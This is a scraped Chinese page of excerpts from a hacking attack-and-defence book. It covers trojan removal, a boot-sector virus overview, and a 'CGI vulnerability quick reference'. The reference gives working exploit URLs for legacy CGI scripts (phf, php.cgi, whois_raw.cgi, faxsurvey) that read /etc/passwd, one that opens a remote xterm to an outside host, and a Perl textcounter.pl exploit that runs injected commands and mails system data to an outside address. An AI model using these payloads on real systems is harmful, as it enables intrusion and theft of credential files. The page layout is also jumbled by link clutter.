摘要:
3.2 常见特洛伊木马的清除方法(2)
3.2.3 冰河清除方法
1. 自动卸载
1.2以后版本的“冰河”本身提供了自动卸载的功能,只需在客户端选择→【控制类命令】→【系统控制】→【自动卸载】命令即可自动卸载。只要先连接127.0.0.1,然后执行【自动卸载】命令就可以彻底卸载冰河。
2. 手动卸载
(1) 重新启动计算机,打开计算机后,按住键盘上的shift键,以安全模式......
摘要:
3.3 病毒防护修复(1)
3.3 病毒防护修复
从广义上讲,病毒可以归为2类:引导区病毒和文件型病毒。
1. 引导区病毒
引导区病毒隐藏在硬盘或软盘的引导区(boot区),当计算机从感染了引导区病毒的硬盘或软盘启动,或是当计算机从受感染的软盘里读取数据时,引导区病毒就开始发作。一旦它们把自己复制到计算机的内存里,就会感染其他磁盘的引导区或是通过网络传播到其他计算机上。
第一......
黑客攻防技术内幕-安全防入侵与防病毒基础(10)
3.5 cgi及系统漏洞速查(1)
3.5 cgi及系统漏洞速查 【程序编程相关:
保护服务器的端口 让黑客也没办法(1)】 【推荐阅读:
保护服务器的端口 让黑客也没办法(6)】
漏洞介绍:phf漏洞是最经典了,可以通过浏览器执行服务器的命令来查找,如下 所示: 【扩展信息:
保护服务器的端口 让黑客也没办法(4)】
● phf漏洞
/etc/passwd
lynx http://server/cgi-bin/phf?qalias=x%0a/bin/cat%20/etc/passwd
● php.cgi 2.0beta10或更早版本的漏洞
漏洞介绍:可以读nobody权限的所有文件.
lynx http://server/cgi-bin/php.cgi?/etc/passwd
注意:
php.cgi 2.1版本的只能读shtml文件,但对于密码文件可能在/etc/master.passwd./etc/security/passwd路径下.
● whois_raw.cgi
lynx http://server/cgi-bin/whois_raw.cgi?fqdn=%0acat%20/etc/passwd
lynx
http://server/cgi-bin/whois_raw.cgi?fqdn=%0a/usr/x11r6/bin/xterm%20-display%20graziella.lame.org:0
● faxsurvey
lynx http://www.victim.com/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd
● textcounter.pl
漏洞介绍:如果服务器上有textcounter.pl,所有人可以以http守护进程的权限执行 命令.
#!/usr/bin/perl $url=http://dtp.kappa.ro/a/test.shtml; # please _do_ _modify_ this $email=pdoru@pop3.kappa.ro,root; # please _do_ _modify_ this if ($argv[0]) { $cmd=$argv[0];}else{ $cmd="(ps ax;cd ..;cd ..;cd ..;cd etc;cat hosts;set)\|mail ${email} -sanothe re_one"; }$text="${url}/;ifs=\8;${cmd};echo|";$text =~ s/ /\$\{ifs\}/g;#print "$text\ n"; system({"wget"} "wget", $text, "-o/dev/null"); system({"wget"} "wget", $text, "-o/dev/null"); #system({"lynx"} "lynx", $text); #如果没有wget命令也可以用lynx #system({"lynx"} "lynx", $text);
● 一些版本(1.1)的info2www的漏洞...
下一页 摘要:
1.1 黑 客 概 述
1.1 黑 客 概 述
黑客最早始于20 世纪50年代,最早的计算机1946年在宾夕法尼亚大学出现,而最早的黑客出现于麻省理工学院,贝尔实验室也有。最初的黑客一般都是一些高级的技术人员,他们热衷于挑战、崇尚自由并主张信息的共享。
1994年以来,因特网在全球的迅猛发展为人们提供了方便、自由和无限的财富,政治、军事、经济、科技、教育、文化等各个方面都越来越网络化......
